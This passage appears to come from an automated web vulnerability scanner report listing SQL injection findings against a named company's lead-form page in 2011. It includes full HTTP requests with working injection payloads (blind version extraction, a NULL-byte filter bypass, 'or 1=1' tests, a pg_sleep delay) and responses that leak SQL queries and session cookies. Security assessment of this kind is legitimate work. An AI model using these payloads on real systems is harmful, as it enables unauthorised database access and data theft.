1.193. http://www.insideup.com/ppc/leadflow/cace00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc%00'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=t4b0ee6bnd20j50ah9liufve04; path=/
Content-Length: 6950
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=1928__Take sales orders&attributeId_394=1939__Not sure&attributeId_395=1947__' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc%00''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4t3hqlge5agvri03fql9ppaob1; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.194. http://www.insideup.com/ppc/leadflow/cace00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9aucqqphgpa9h3athkplrdtde3; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=87o46lnmqbv154jhjageq8vj47; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.195. http://www.insideup.com/ppc/leadflow/cace00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. The payloads 91962056'%20or%201%3d1--%20 and 91962056'%20or%201%3d2--%20 were each submitted in the lastname parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name91962056'%20or%201%3d1--%20&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name91962056'%20or%201%3d2--%20&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:44:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.196. http://www.insideup.com/ppc/leadflow/cace00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=borid9r74radreourmfr6cpe25; path=/
Content-Length: 6974
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
Id_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND 1=(' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1k1ifk9uej48506fjctb9lo4n6; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.197. http://www.insideup.com/ppc/leadflow/cace00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rq11kbppavht4gssnqga8trj21; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=-1 OR 1=1 AND' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gahhmb8be0c2970gjmnbdqt5i5; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.198. http://www.insideup.com/ppc/leadflow/cace00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
